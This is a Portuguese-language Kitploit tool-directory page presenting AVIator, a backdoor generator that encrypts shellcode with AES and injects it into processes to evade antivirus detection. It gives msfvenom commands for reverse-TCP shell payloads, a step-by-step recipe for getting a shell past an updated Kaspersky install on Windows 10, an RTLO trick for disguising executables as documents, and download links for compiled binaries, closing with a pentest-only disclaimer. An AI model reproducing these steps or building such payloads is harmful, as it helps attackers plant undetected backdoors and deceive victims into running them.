Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
AVIator — Projeto de evasão de antivírus | Kitploit
Ferramentas/GitHubGitHub/ch0pin/aviator
Ferramentas de Criptografia/DescriptografiaFrameworks de ExploraçãoGeração de PayloadsShellcodeTestes de PenetraçãoRed TeamingArchived
GitHubch0pin/aviator

AVIator

Projeto de evasão de antivírus

Ver Repositório
1.2k230há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

AVIAtor Portado para NETCore 5 com uma UI atualizada

AV|Ator

Sobre://name

AV: AntiVirus

Ator: É um espadachim, alquimista, cientista, mago, acadêmico e engenheiro, com a capacidade de às vezes produzir objetos do nada (https://en.wikipedia.org/wiki/Ator)

Sobre://purpose

AV|Ator é um utilitário gerador de backdoors, que utiliza técnicas criptográficas e de injeção para contornar a detecção de AV. Mais especificamente:

  • Utiliza criptografia AES para criptografar um shellcode fornecido
  • Gera um arquivo executável que contém o payload criptografado
  • O shellcode é descriptografado e injetado no sistema alvo usando várias técnicas de injeção

[https://attack.mitre.org/techniques/T1055/]:

  1. Injeção de executável portátil que envolve escrever código malicioso diretamente no processo (sem um arquivo em disco) e depois invocar a execução com código adicional ou criando uma thread remota. O deslocamento do código injetado introduz o requisito adicional de funcionalidade para remapear referências de memória. Variações deste método, como injeção reflexiva de DLL (escrever uma DLL auto-mapeada em um processo) e módulo de memória (mapear DLL ao escrever no processo), superam o problema de realocação de endereços.

  2. Sequestro de execução de thread que envolve injetar código malicioso ou o caminho para uma DLL em uma thread de um processo. Semelhante ao Process Hollowing, a thread deve primeiro ser suspensa.

Uso

O aplicativo possui um formulário que consiste em três entradas principais (Veja a captura de tela abaixo):

Screenshot 2019-04-29 at 11 41 21

  1. Um texto contendo a chave de criptografia usada para criptografar o shellcode
  2. Um texto contendo o IV usado para criptografia AES
  3. Um texto contendo o shellcode

Nota importante: O shellcode deve ser fornecido como um array de bytes em C#.

Os valores padrão contêm shellcode que executa notepad.exe (32 bits). Esta demonstração é fornecida como uma indicação de como o código deve ser formado (usando msfvenom, isso pode ser feito facilmente com a opção -f csharp, ex.: msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

Após preencher as entradas fornecidas e selecionar o caminho de saída, um executável é gerado de acordo com as opções escolhidas.

Opção RTLO

Em palavras simples, falsificar um arquivo executável para parecer ter uma extensão "inocente" como 'pdf', 'txt' etc. Ex.: o arquivo "testcod.exe" será interpretado como "tesexe.doc"

Cuidado com o fato de que alguns AVs alertam a falsificação por si só como um malware.

Definir ícone personalizado

Acho que todos sabem o que é :)

Contornando o Kaspersky AV em um host Win 10 x64 (CASO DE TESTE)

Obtendo um shell em uma máquina Windows 10 executando o Kaspersky AV totalmente atualizado

Máquina Alvo: Windows 10 x64

  1. Crie o payload usando msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Use o AVIator com as seguintes configurações

    Arquitetura do SO alvo: x64

    Técnica de Injeção: Thread Hijacking (Arquitetura do Shellcode: x64, arquitetura do SO: x64)

    Procedimento alvo: explorer (deixe o padrão)

  3. Configure o listener na máquina atacante

  4. Execute o exe gerado na máquina vítima

Instalação

Windows:

Compile o projeto ou baixe o executável já compilado da seguinte pasta:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Instale o Mono de acordo com sua distribuição Linux, baixe e execute os binários

ex. no kali:

root@kitploit:~
   root@kali# apt install mono-devel 
   
   root@kali# mono aviator.exe

Créditos

Para Damon Mohammadbagher pelo procedimento de criptografia

Aviso Legal

Desenvolvi este aplicativo para superar os desafios do processo de pentest e esta é a ÚNICA MANEIRA pela qual este aplicativo deve ser usado. Certifique-se de ter a permissão necessária para usá-lo contra um sistema e nunca o use para fins ilegais.

Baixar ferramenta